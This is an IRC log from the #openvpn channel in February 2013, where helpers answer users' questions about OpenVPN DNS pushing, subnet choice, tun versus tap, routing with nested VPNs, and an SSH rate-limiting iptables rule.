server is running debian, it works fine from linux and mac osx, but not windows 7 (client that is) 08:11 -!- Holiday [~rjr162@128.118.15.39] has quit [Quit: Leaving] 08:11 -!- Holiday [~rjr162@128.118.15.39] has joined #openvpn 08:13 -!- NuclearMeltdown [~rep@unaffiliated/antiliberal] has quit [Ping timeout: 245 seconds] 08:26 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has quit [Ping timeout: 252 seconds] 08:55 -!- nickanderson_afk is now known as nickanderson 08:59 -!- nickanderson is now known as nickanderson_afk 09:02 -!- gedO_ [~quassel@88.119.154.240] has joined #openvpn 09:04 -!- Cybert1nus [~Cybertinu@2001:828:405:30:83:96:177:42] has joined #openvpn 09:05 -!- GabrieleV_ [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 09:06 -!- kirin` [telex@gateway/shell/anapnea.net/x-bycvgppbjdznazft] has quit [Disconnected by services] 09:06 -!- con3x_ [~pkinnaird@kobol.geeksoc.org] has joined #openvpn 09:06 -!- kirin` [telex@gateway/shell/anapnea.net/x-qvzgpuzezirigqrs] has joined #openvpn 09:07 -!- AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 276 seconds] 09:07 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 276 seconds] 09:07 -!- paccer [uid4847@gateway/web/irccloud.com/x-iggwqzmrrmnhkcai] has quit [Ping timeout: 276 seconds] 09:07 -!- sam1 [~sam@194-236-182-101.customer.telia.com] has quit [Ping timeout: 276 seconds] 09:07 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 276 seconds] 09:07 -!- hazardous [~dbn@openvpn/user/hazardous] has quit [Ping timeout: 276 seconds] 09:07 -!- sitaktif [~sitaktif@kollok.org] has quit [Ping timeout: 276 seconds] 09:07 -!- gedO [~quassel@2002:5877:9af0:1000:3978:6c96:5f0b:5e20] has quit [Ping timeout: 276 seconds] 09:07 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has quit [Ping timeout: 276 seconds] 09:07 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has quit [Ping timeout: 276 
seconds] 09:07 -!- EugeneKay [eugene@madeitwor.se] has quit [Ping timeout: 276 seconds] 09:07 -!- con3x [~pkinnaird@kobol.geeksoc.org] has quit [Ping timeout: 276 seconds] 09:07 -!- nutcase [~nutcase@2605:6400:2:fed5:22:0:b4f1:bd54] has joined #openvpn 09:07 -!- hazardous [~dbn@void.kassad.in] has joined #openvpn 09:07 -!- EugeneKay [eugene@madeitwor.se] has joined #openvpn 09:07 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Remote host closed the connection] 09:07 -!- dxtr [~dxtr@2001:470:28:93::cb] has joined #openvpn 09:07 -!- dxtr [~dxtr@2001:470:28:93::cb] has quit [Changing host] 09:07 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 09:07 -!- zz_AsadH [~AsadH@irc.unixio.com] has joined #openvpn 09:07 -!- nutcase [~nutcase@2605:6400:2:fed5:22:0:b4f1:bd54] has quit [Changing host] 09:07 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 09:07 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn 09:07 -!- neilhwatson1 [~neil@cl-274.chi-03.us.sixxs.net] has joined #openvpn 09:07 -!- zz_AsadH is now known as AsadH 09:07 -!- AsadH [~AsadH@irc.unixio.com] has quit [Changing host] 09:07 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 09:07 -!- sam1 [~sam@194-236-182-101.customer.telia.com] has joined #openvpn 09:08 -!- sitaktif [~sitaktif@kollok.org] has joined #openvpn 09:10 -!- AsadH is now known as zz_AsadH 09:10 -!- hg_5__ [~chatzilla@91.234.245.245] has quit [Quit: ChatZilla 0.9.89-rdmsoft [XULRunner 1.9.0.17/2009122204]] 09:10 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 09:12 -!- kirin` [telex@gateway/shell/anapnea.net/x-qvzgpuzezirigqrs] has quit [Ping timeout: 252 seconds] 09:13 -!- kirin` [telex@gateway/shell/anapnea.net/x-ywbpjkygyhlnqciv] has joined #openvpn 09:15 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 09:15 < xtz> hey guys 09:16 < xtz> any1 with experience with the android client? 09:16 <@dazo> xtz: which version of it? 
09:17 < xtz> latest - 1.1.9
09:17 < xtz> I have a very weird issue which might not be related to android's client only
09:18 < xtz> I'm pushing DNS servers from my server with:
09:18 < xtz> push "dhcp-option DNS x.x.x.x"
09:18 < xtz> when DNS fallback is not checked on the client - it's using the x.x.x.x nameserver and everything is perfect
09:19 < xtz> when DNS Fallback is checked though, it tries to use Google's DNS servers which means x.x.x.x is not pushed to the client... and I wonder why :\
09:19 <@dazo> xtz: there are a brazillion android clients in Google Play ... I meant: which of them? ... "OpenVPN for Android", "OpenVPN Connect", etc, etc
09:19 < xtz> openvpn connect :)
09:19 <@dazo> ahh, okay
09:19 < xtz> dazo: sorry didn't get ur question
09:20 <@dazo> novaflash: ^^^ this is probably your table :)
09:20 <@novaflash> hi dazo
09:20 <@novaflash> what's that hat on your head?
09:20 <@dazo> it means, look on the text above ...
09:20 <@novaflash> i need new glasses. looks like a santa hat
09:20 <@dazo> s/ on / at /
09:21 <@novaflash> well
09:21 <@novaflash> as far as i understand it
09:21 <@novaflash> DNS fallback is meant to do exactly that
09:22 < xtz> According to the description of the option
09:22 <@novaflash> yes, i know
09:22 <@novaflash> but it's an override
09:22 < xtz> 'Use Google DNS servers as a fallback for connections that route all internet traffic through the VPN tunnel but don't define any VPN DNS servers'
09:23 < xtz> I do route all the traffic but I define DNS servers too
09:23 <@novaflash> right, but you read it to mean that there is a logic involved that does an "if not dns server defined use google dns"
09:23 <@novaflash> but instead it's just an on/off for forcing google dns servers
09:23 < xtz> Alright, thanks :-)
09:23 <@novaflash> for those situations where people are using access servers that route all internet traffic through the vpn tunnel but where the access server does not define a vpn dns server
09:23 < xtz> saved me some debugging hrs :p
09:23 <@novaflash> :)
09:23 <@novaflash> it's not a bug
09:23 <@novaflash> it's a feature!
09:24 <@novaflash> for real, this time
09:24 <@novaflash> it's kind of strange though
09:24 <@novaflash> because by default when you set access server to redirect
09:24 <@novaflash> you are forced to define dns servers
09:24 <@novaflash> but sometimes people do override to disable that for some reason
09:25 <@novaflash> oh no it's EugeneKay
09:25 * novaflash flees like a shadow before the candlelight
09:26 <+EugeneKay> Pffft, I haven't gone wild with power yet
09:26 < xtz> In my case I've set PF to allow DNS traffic only to my ISP's DNS servers (I tend to get a nice & tidy footprint on my uplink bw) and since it was trying Google's servers - traffic got blocked
09:26 <@novaflash> ah
09:27 <@novaflash> there is also a nasty thing you could do
09:27 <@novaflash> and implement iptables rule for tcp and udp 53 ports to redirect all dns queries through the vpn tunnel to a local dns server or whatever dns server you like
09:27 <@novaflash> that's a dirty trick tho
09:27 <@novaflash> but it works
09:28 <@novaflash> i have no idea why you would want to do that
09:28 <@novaflash> but there it is
09:29 < xtz> OpenBSD and PF here, but yeah - I get the idea :-)
09:30 <@novaflash> oh yes pf then
09:31 < xtz> alright, thanks for your help
09:32 <@novaflash> this concludes our transaction. your soul is now mine.
09:34 < xtz> erm... alright, but I'm afraid that traffic is blocked by PF as well
09:34 <@novaflash> sysadmins.. the worst kind! okay i'll go harvest some souls elsewhere
09:35 < xtz> and I'll go home to get some sleep before the gym
09:36 < xtz> take care
09:36 <@novaflash> adios
09:50 <@plaisthos> novaflash: :)
09:52 <@novaflash> hi plaisthos
09:52 <@plaisthos> No DNS servers being used. Name resolution may not work. Consider setting custom DNS Servers
09:53 <@plaisthos> is my warning for this kind of cases :)
09:53 <@novaflash> i wonder if openvpn connect has such a warning built in
09:54 <@novaflash> i'm guessing not
10:46 < Holiday> So in TAP mode you can set the server-bridge to set the IP of the openvpn "server/bridge" to whatever you want (say .88.126) and the client range as well (88.127-.145), but with the TUN mode server option you're pretty much stuck with a 88.0/24 with the server taking 88.1?
10:50 <@novaflash> Holiday: i think you can use any CIDR notation acceptable range
10:51 <@novaflash> but the general idea is that you have a subnet that the vpn clients and the vpn server are all on and the vpn server ip on that subnet serves as the gateway, and that would be the first ip yes
10:51 <@novaflash> but 88.10.20.128/28 works fine too
10:52 <@novaflash> in TAP mode you don't need a gateway IP for the vpn subnet because it's a bridge
10:54 <@novaflash> but yeah server-bridge does define the ip for the openvpn server and yeah it is all open and free and easy to use
10:54 < rob0> "--server x.x.88.0 255.255.255.0" assigns x.x.88.1 to the server. But --server is a macro. You can use all the component parts of it, including --ifconfig, and set the IP you want.
10:54 < Holiday> ah okay nice
10:54 <@novaflash> all hail rob0
10:56 < Holiday> I must have missed that part of the MAN file (not hard to do as you get a ton of options!)
10:57 <@novaflash> there's a man file?
10:58 < Holiday> i suppose not many that hit up the channel RTFM, But I've tried :) (and about every site google ever has indexed)
10:59 <@novaflash> cool
11:16 < troker> Hey all - could anyone point me in the right direction for configuring a "server-only" connection with OpenVPN? -- I would like to have multiple services available to all clients on the VPN, but only the VPN port open on the actual physical interface.
11:19 <@krzee> !sample
11:19 <@vpnHelper> "sample" is (#1) http://www.ircpimps.org/openvpn.configs for a working sample config or (#2) DO NOT use these configs until you understand the commands in them, read up on each first column of the configs in the manpage (see !man) or (#3) these configs are for a basic multi-user vpn, which you can then build upon to add lans or internet redirecting
11:20 <@krzee> troker, ^
11:21 < troker> krzee: I guess my question was more about the logistics of setting up services to listen on the openvpn interface.
11:21 < troker> or am I missing something here?
11:22 <@krzee> logistics?
11:22 <@krzee> tell the app what ip to bind to
11:22 < troker> Will that cause issues when the openvpn server is not running?
11:25 <@krzee> …yes… it won't work
11:46 < fys> fail2ban is quite powerful
11:46 < fys> heh
12:24 <+EugeneKay> iptables -A INPUT -m tcp -p tcp --dport 22 -m hashlimit --hashlimit-name ssh --hashlimit-upto 5/minute --hashlimit-mode srcip --hashlimit-srcmask 24 -j ACCEPT
12:25 <+EugeneKay> All of the log spam reduction, none of the background processes
12:25 <+EugeneKay> And it works on IPv6, too
12:26 <@krzee> !fail2ban in linux you can replace fail2ban without the background process with something like: iptables -A INPUT -m tcp -p tcp --dport 22 -m hashlimit --hashlimit-name ssh --hashlimit-upto 5/minute --hashlimit-mode srcip --hashlimit-srcmask 24 -j ACCEPT
12:26 <@krzee> err
12:26 <@krzee> !learn fail2ban as in linux you can replace fail2ban without the background process with something like: iptables -A INPUT -m tcp -p tcp --dport 22 -m hashlimit --hashlimit-name ssh --hashlimit-upto 5/minute --hashlimit-mode srcip --hashlimit-srcmask 24 -j ACCEPT
12:26 <@vpnHelper> Joo got it.
12:26 <+EugeneKay> ;-)
12:27 <@krzee> =]
12:27 <+EugeneKay> It's fairly crude, but damn if it don't work right
12:48 < Holiday> if I'm setting up the --server script manually would it be better to use net30 or subnet (or does it matter) for the VPN "server ip" network to be .128/28 as mentioned above? (This is pretty much going to be OS X and Windows clients)
13:28 <+EugeneKay> subnet.
13:28 <+EugeneKay> /30 is a legacy hack for Windows clients
13:50 < Holiday> EugeneKay: Thanks!
14:25 < havoc> wow, 2.3.0 not even in Experimental yet
14:29 < havoc> checkinstall it is
14:30 < havoc> well, was gonna be anyway, I just wanted to re-verify the file structure
14:44 < sedulous> Hey. The change log for OpenVPN 2.3 says "full IPv6 support". Does that mean you can have a pure IPv6 VPN now?
14:44 < sedulous> (... on layer 3, it was already possible on layer 2 of course)
14:45 < sedulous> The last time I tried it, IPv6 on L3 with an address pool worked but you still had to use IPv4 in parallel
15:37 <@plaisthos> sedulous: still need to have an IPv4 address pool
15:37 <@plaisthos> sedulous: It is the first released version with IPv6 Layer3 support
15:47 <+EugeneKay> I don't think you're required to have ipv4 pool
15:56 < sedulous> plaisthos: thanks
15:56 < sedulous> plaisthos: yes, what i tried a few months ago was 2.3_rc*
17:02 < CrashTM> I have a server with multiple public ips, how might i go about configuring openvpn
17:19 < pekster> You might configure openvpn to use one of your public IPs
17:25 < CrashTM> would that be in the client config?
17:26 < pekster> The client needs the IP or hostname resolving to the IP the server is listening on, yes
17:34 < CrashTM> ok so in my client config it says "remote 69.x.x.x 1194"
17:35 < CrashTM> 69.x.x.x is the first of the two ips if i change the 69.x.x.x to one of the other public ips for example 65.x.x.x the person connecting will get the ip 65.x.x.x and not 69.x.x.x
17:44 < CrashTM> ?
17:44 < pekster> I didn't see a question there
17:44 < CrashTM> Would that work?
17:45 < pekster> The connecting person doesn't "get" the IP of your remote peer. Only 1 host can ever "have" a specific public IP
17:45 < pekster> You should try re-phrasing your question
17:47 < CrashTM> what would i need to do to give a client a specific public ip
17:48 < pekster> Ah, that's the question you should have asked from the beginning if it's what you wanted
17:49 < CrashTM> sorry if i have not been clear
17:49 < pekster> If you get your IPs on this server via an Ethernet link, you may be better off providing a tap connection to the client. You can mess around with a 1:1 NAT, but that's a bit messy
17:51 < pekster> You can't use tun and have the client hold the public IP directly across OpenVPN unless the traffic is routed to you; if the 2nd IP is expected to be on the Ethernet link, you need an actual Ethernet host connected to respond to the ARP
17:52 < CrashTM> well i already have the server running and working. It currently has 1 public ip. i wanted to see what i had to do if i added an ip in order to use that added ip with my openvpn server, what would i need to do for that
17:55 < pekster> I'm not exactly sure what you're trying to do by giving the client its own public IP across the VPN link, but you basically have 3 choices
17:55 < pekster> 1) Create an Ethernet bridge on the public interface of the server, and the client connects via tap to that bridge to get/set the IP
17:55 < pekster> 2) Have the server own both public IPs, give the client an rfc1918 IP across the VPN, and perform 1:1 NAT
17:56 < pekster> 3) Have the ISP route the 2nd IP to you instead of treating it on-link
18:04 < osirisx11> hi all, how can i force openvpn initialize after boot - and start my wifi also?
18:05 < osirisx11> and vpn info is stored on a portable drive that i would insert
18:05 < pekster> You'd need some OS-level magic to know when the USB drive was inserted and take action based on it; that doesn't really work "on boot" due to the dynamic nature of removable media
18:06 < pekster> Besides that point, configure openvpn to start however you'd like on that event and it'll just keep retrying if the network is down
18:17 < CrashTM> the idea behind my openvpn server is to pretty much obfuscate my personal ip
18:17 < CrashTM> i wanted to get a second ip from my host and add that to my openvpn server
18:18 < pekster> I just use a proxy to the same effect for proxy-aware applications (I've got a browser profile that uses FoxyProxy that connects to an IP on a rfc1918 VPN running on a hosted cloud server)
18:19 < pekster> You can do what you propose too, it just involves a bit more network stuff to set up
18:20 < CrashTM> any idea on how i might use that second ip with my openvpn server?
18:21 < pekster> ...
18:21 < pekster> I just told you your 3 choices. Pick one and implement it
18:22 < CrashTM> sorry, i was unsure if my options changed fior what i wanted to do
18:22 < CrashTM> whaat do you think would be the best
18:22 < CrashTM> for*
18:22 < pekster> A proxy, which is why I suggested it. That doesn't quite meet your original stated goal, but it might achieve the same effect if the applications you intend to use are proxy-aware
18:23 < pekster> Otherwise, it all depends on your preference. tap involves less trickery, but you lose some efficiency due to larger headers and ARP traffic. tun+NAT is slightly more efficient but has the hassle of setting up NAT rules. routing is easier, but requires your ISP to support that
18:24 * pekster shrugs
18:24 < pekster> End of the day it all "works", just a matter of how you want to do it
18:24 < CrashTM> ah
18:24 < CrashTM> i would use a proxy but most of the programs that i use are not proxy aware
19:12 < marcolepsy> I have both OpenVPN and Hamachi VPNs configured on my Raspberry Pi (debian wheezy). Each routes traffic over separate interfaces (tun0 and ham0 respectively). Everything works fine except quite slow when run together. Not slow when run separately. Any ideas?
19:16 < pekster> marcolepsy: They're completely unrelated; there's no reason for one to interfere with another unless you're routing the encapsulating traffic for one VPN through another
19:16 < pekster> (which might happen transparently if, for example, you override the default gateway in one)
19:22 < marcolepsy> It's strange... I start Hamachi first, then after it's up and running, I start OpenVPN. Consistently, my ping times go from 4 ms to 600 or so on average a few minutes after I start the OpenVPN daemon.
19:23 < pekster> pings to what? Taking what route?
19:24 < marcolepsy> Sorry, pings to another client in Hamachi mesh network.
19:24 < marcolepsy> ... going over the Hamachi interface
19:25 < pekster> I don't know anything about the hamachi VPN. Sounds to me like perhaps you're messing with the gateway as part of your openvpn setup causing the encapsulating protocol traffic for the other VPN to take a different route
19:25 < pekster> Just a guess though
19:30 < marcolepsy> Would "ip -s route get " definitively tell me whether the route for that IP is affected? It does not change after starting Hamachi.
19:30 < marcolepsy> I've also run "traceroute ", and the result is the same both before and after.
19:31 < pekster> Won't help
19:32 < pekster> You need to know if the *encapsulating* protocol is being redirected, not the inside tunnel
19:32 < pekster> I have 12 hops to my IPv6 tunneling provider, but a trace treats it as "one hop" because it's occurring inside the tunnel
19:33 < pekster> Optionally, pastebin your server & client openvpn configs to see if you're messing with routes/gateways at all on connect
19:33 < marcolepsy> Ah, I see. Thanks. That doesn't solve my problem but is helpful for my understanding. I'm obsessing over it more for the sake of understanding what's going on than for any important practical reason.
19:34 < pekster> At the end of the day your issue isn't actually caused by openvpn, just how you're choosing to route across it. OpenVPN is not aware of or able to communicate with any other VPN protocol
19:34 < pekster> It can interact with your OS to a degree, including changing your routing table and calling external scripts/programs
19:35 < marcolepsy> Yes, I mean really I'm trying to skip routing across OpenVPN for this traffic altogether. I'd like to say, "don't touch any traffic sourced from or sent to this IP range".
19:36 < pekster> That's the default behaviour of openvpn; you need to explicitly configure it to route non-VPN-network traffic across it
19:36 < pekster> (which is why I need to see server+client configs to say either way for you.)
19:37 < pekster> OpenVPN does not mess with your routes unless you ask it to (the virtual link expected, of course)
19:37 < pekster> excepted*
19:39 < pekster> Further reading can be found in the manpage under the directives: --route and --redirect-gateway
19:41 < marcolepsy> Well, I'm certainly not asking you to figure this out for me, but in case you'd like to see the configuration files, I'm using the unmodified files for UDP 53 from http://www.vpnbook.com/#pricing
19:41 <@vpnHelper> Title: VPNBook | 100% Free VPN Service - OpenVPN and PPTP (at www.vpnbook.com)
19:41 < marcolepsy> I will pastebin so you don't have to download the zip.
19:42 < pekster> That won't really help unless you have both sides of the config
19:42 < pekster> Directives can be pushed
19:42 < marcolepsy> Ah, nope, I don't. I see.
19:43 < pekster> You can avoid pulling some options, although that may break things you "expect" to happen when you connect
19:43 < pekster> Reading about that can be had in the manpage under these options: --route-nopull & --route-noexec
19:44 < pekster> !provider
19:44 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team.
19:46 < marcolepsy> Haha. I follow. Again, I'm not dying to get this working. I'm more interested in understanding what's going on to understand each of the two services a bit better, but even more so tunneling more generally.
19:46 < marcolepsy> Thanks for providing some leads.
19:47 < pekster> You have a VPN in a VPN
19:48 < pekster> Traffic inside the inner VPN gets encapsulated in another protocol's packet. It then gets wrapped in another VPN protocol's packet and sent to that VPN peer. It decapsulates the first VPN's encapsulating packet, and sends it to the destination. That peer then decapsulates the traffic and sends it to the original destination
19:48 < pekster> It all works backwards for reply traffic
19:48 < pekster> Any one of those points could slow the traffic down
19:50 < marcolepsy> Ah, see I thought I had a VPN running *next to* another VPN, where they wouldn't interface or interfere with one another. Maybe I will pursue this with VPNBook to see if they can provide some explanation about what happens on their end. I doubt I will get much from Hamachi, although they do have a community forum.
19:52 < pekster> They're clearly pushing 'redirect-gateway'. Go read about how openvpn works, since they're not likely to change things for a single customer
19:52 < pekster> Log at 'verb 4' and view your logs to see exactly what's going on
19:52 < pekster> I gave you all the references you need to look up in the manpage
19:52 < pekster> (If you don't want that option, read about the override choices you have)
19:53 < pekster> Nothing to do with them if you want to change your config
19:53 < marcolepsy> Perfect. Thanks very much.
20:41 < ownermint> hello: I'm having with OSI Layer: 2 (ethernet bridging). http://pastebin.com/BVHd14kp any ideas?
20:42 < pekster> Firewall most likely
20:42 < pekster> Also, the obvious question "do you actually need bridging/tap" applies:
20:42 < pekster> !tunortap
20:42 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you
20:42 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun.
20:43 < ownermint> Yes, #4 and I have tap installed on win 7 x64
20:44 < pekster> Depends on the game then, I suppose. Some games use network broadcasts, but if you don't mind using IPs or DNS, tun tends to work fine too (minus subnet "auto game discovery stuff.") That said, you may actually want tap, so that's a valid choice here
20:44 < pekster> Since you can ping the VPN server, you know connectivity is working. Sounds like a firewall, probably on the server, not forwarding the traffic
20:45 < pekster> Well, "forwarding" in the Layer 2 sense, not the IP/routing sense
20:45 < ownermint> this is an access server
20:45 < pekster> Then you're in the wrong place
20:45 < pekster> !as
20:45 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server
20:45 < pekster> This channel is for the GPL OpenVPN project
20:45 < ownermint> ok thanks I see that now
21:11 < ownermint> !wins
21:11 <@vpnHelper> "wins" is http://oreilly.com/catalog/samba/chapter/book/ch07_03.html is a good link for seeing how to run WINS on samba
--- Day changed Tue Feb 12 2013
04:42 < CaBa> hi
04:43 < CaBa> my vpn connection terminates after a flood of those messages in the client log:
04:43 < CaBa> Feb 12 11:42:15: write UDPv4: No buffer space available (code=55)
04:43 < CaBa> what causes this?
04:44 < pekster> Possibly a routing loop, according to:
04:44 < pekster> !buffer
04:44 <@vpnHelper> "buffer" is when you see write UDPv4: No buffer space available (code=55) you probably have a routing loop. the way to fix this is to get a book on basic networking, preferably a coloring book!
04:46 < CaBa> hm... well the connection actually holds up for quite a while, however, when i get a not of terminal output through an SSH session going through the VPN the connection reproducibly terminates
04:46 < CaBa> s/not/log/
04:46 < CaBa> s/not/lot/
04:46 < pekster> Oh, then probably not that suggestion
04:47 < CaBa> the vpn connection is nested in another (PPTP) vpn connection... maybe that makes things tricky
04:55 < pekster> Seemingly lots of results skewed towards OpenBSD online
04:55 < pekster> Does that happen to be your platform?
04:55 < pekster> fbsd too
04:57 < pekster> Maybe it's something weird in the way packets are being queued between the encapsulating VPN tun device and the device it's going to? The buffer is something huge like 9k that you shouldn't normally be filling up before it gets passed to the next layer
05:04 < CaBa> well, it's mac os so it's a "BSDish" backend...
05:06 < pekster> Yea, some mac results in the search too.
It just suggests to me that this issue may be OS-specific 05:18 -!- RealRancor [~Rancor@mafiaforum.de] has quit [Ping timeout: 264 seconds] 05:26 < pekster> http://www.mail-archive.com/misc@openbsd.org/msg99875.html 05:26 <@vpnHelper> Title: OpenVPN and traceroute: UDPv4: No buffer space available [SOLVED] (at www.mail-archive.com) 05:26 < pekster> Maybe that's somewhat helpful 05:27 < pekster> Looks like some BSD queuing issue. That message is caused by the underlying packet-handnler of the OS returning the 'ENOBUFS' error, which implies that the device is unable to handle queuing any more data 05:28 < pekster> Not to say you need a fancy hfsc setup, but the stuff about qlimits are possibly relevant, as are your device queue sizes 05:29 < pekster> I had to increase the tun packet buffer up from the default of 100 on some Linux environments a job or two back due to queue limitations 05:46 < CaBa> thanks, i'll look into that 05:48 -!- folivora_ [~out@46.19.34.64] has joined #openvpn 05:48 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 05:49 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 240 seconds] 05:49 -!- clu5ter [~staff@unaffiliated/clu5ter] has quit [Ping timeout: 240 seconds] 05:49 -!- folivora [~out@46.19.34.64] has quit [Ping timeout: 240 seconds] 05:49 -!- sam1 [~sam@194-236-182-101.customer.telia.com] has quit [Ping timeout: 240 seconds] 05:49 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Ping timeout: 240 seconds] 05:49 -!- thermoman [~thermoman@idle.foobar0815.de] has quit [Ping timeout: 240 seconds] 05:50 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has joined #openvpn 05:50 -!- sam1 [~sam@194.236.182.101] has joined #openvpn 05:50 -!- thermoman [~thermoman@idle.foobar0815.de] has joined #openvpn 05:51 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn 05:56 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 05:56 -!- [fred] [fred@konfuzi.us] has joined 
#openvpn 06:00 -!- MarKsaitis [~MarKsaiti@194.168.230.106] has quit [Ping timeout: 255 seconds] 06:00 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 06:03 -!- tMobile4a03 is now known as tyteen4a03 06:05 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has quit [Read error: Operation timed out] 06:05 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has joined #openvpn 06:35 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn 06:35 -!- mode/#openvpn [+o plaisthos] by ChanServ 06:39 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 256 seconds] 06:51 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 07:01 -!- knobo [~bohmer@80.213.73.254] has joined #openvpn 07:02 < knobo> Do I have to specify the ip of the client in an vpn, or is it enough that the client spcify that it self? 07:03 -!- master_of_master [~master_of@p57B52D17.dip.t-dialin.net] has quit [Ping timeout: 260 seconds] 07:03 < knobo> Maybe I should use the tap, and not tun 07:04 < knobo> I have multiple clients connecting, and one server. 07:04 < knobo> The client should not route traffic between each other. 07:05 -!- master_of_master [~master_of@p57B53160.dip.t-dialin.net] has joined #openvpn 07:37 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 245 seconds] 07:37 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 07:39 <@ecrist> knobo: what are you trying to do? 
07:39 <@ecrist> in most cases, tun is correct
07:39 <@ecrist> !goal
07:39 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server, I would like to access the internet over my vpn, I just want a secure connection between 2 computers, etc
07:40 -!- bauruine [~stefan@91.236.116.112] has quit [Max SendQ exceeded]
07:41 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
07:42 -!- p3rror [~mezgani@2001:0:53aa:64c:3407:77b8:d673:9b9f] has joined #openvpn
07:44 -!- khem_ [~x@lotus.redl8.com] has left #openvpn []
07:45 < knobo> Goal: I have about 30 client computers sitting behind their own firewall, I shall monitor them with nagios on a cloud server. I have autossh/ppp-tunnel from the clients to the server today but it is not very stable. I want to change to openvpn.
07:45 <@ecrist> sounds like you need a regular ol' openvpn setup
07:45 <@ecrist> assign IPs from the VPN server, use a routed setup (not bridged)
07:46 < knobo> The clients' tunnel address is 192.168.1.x, and the server has 192.168.1.1
07:46 <@ecrist> I suggest a different address range
07:46 <@ecrist> !1918
07:46 <@vpnHelper> "1918" is (#1) RFC1918 makes three unique netblocks available for private use: 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 or (#2) see also: http://en.wikipedia.org/wiki/Private_network or http://www.faqs.org/rfcs/rfc1918.html or (#3) Too lazy to find your own subnet? Try this one: http://scarydevilmonastery.net/subnet.cgi
07:47 < knobo> Why not that address range? it is within the 192.168.0.0/16 range.
07:48 < pekster> It's also a very common /24 for home-network devices and other "pre-configured" NAT devices
07:48 <@ecrist> because it's the default range for every consumer-grade access device
07:48 <@ecrist> there's a high probability you'll run into address space conflicts
07:48 < pekster> Same problem with 192.168.0.0/24 and 10.0.0.0/23 (either of its /24's)
07:49 < knobo> ok, so I should use 192.168.3.0/24
07:49 < pekster> If you can be somewhat sure it's really never going to be in use by one of your remote systems on any of its attached (or upstream) networks, then sure
07:50 < pekster> If there's any doubt, you should pick a much more obscure range. Using something randomly picked in 172.16/12 is usually the "best" bet for avoiding conflicts, but it depends on your situation
07:53 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
07:58 -!- yavor_ is now known as y4h0
08:02 -!- cpm [~Chip@216.169.175.102] has joined #openvpn
08:02 -!- cpm [~Chip@216.169.175.102] has quit [Changing host]
08:02 -!- cpm [~Chip@pdpc/supporter/active/cpm] has joined #openvpn
08:02 -!- cpm [~Chip@pdpc/supporter/active/cpm] has left #openvpn []
08:04 < knobo> thanx
08:08 -!- cek [~cek@crius.pantheon.fused.net] has joined #openvpn
08:09 -!- cek [~cek@crius.pantheon.fused.net] has left #openvpn []
08:09 -!- yuri___ [~cek@crius.pantheon.fused.net] has joined #openvpn
08:14 -!- yuri___ [~cek@crius.pantheon.fused.net] has quit [Ping timeout: 276 seconds]
08:30 -!- marcolepsy [~marcoleps@64-121-192-7.c3-0.eas-ubr2.atw-eas.pa.cable.rcn.com] has joined #openvpn
08:30 -!- yuri___ [~cek@78.26.128.206] has joined #openvpn
08:47 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has quit [Changing host]
08:47 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn
08:58 -!- knobo [~bohmer@80.213.73.254] has quit [Ping timeout: 245 seconds]
09:11 -!- MarKsaitis [~MarKsaiti@194.168.230.106] has joined #openvpn
09:33 < yuri___> test
09:33 < yuri___> How do I tell openvpn to track the status of the interface it's working through? wlan0 goes down periodically and the route to the vpn peer goes down with it, too.
09:35 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn
09:39 -!- str8uplinux [~dschuett@mail.lonemountaintruck.com] has joined #openvpn
09:39 < str8uplinux> what would cause "WARNING: Failed running command (--up/--down): external program exited with error status: 7" I'm trying to manually add/del routes with an up/down script
09:40 < pekster> str8uplinux: Your program exiting with error code 7 would cause that. Add some verbosity to your script to see why, but *your* script is the thing returning that code
09:40 -!- yuri___ [~cek@78.26.128.206] has quit [Ping timeout: 256 seconds]
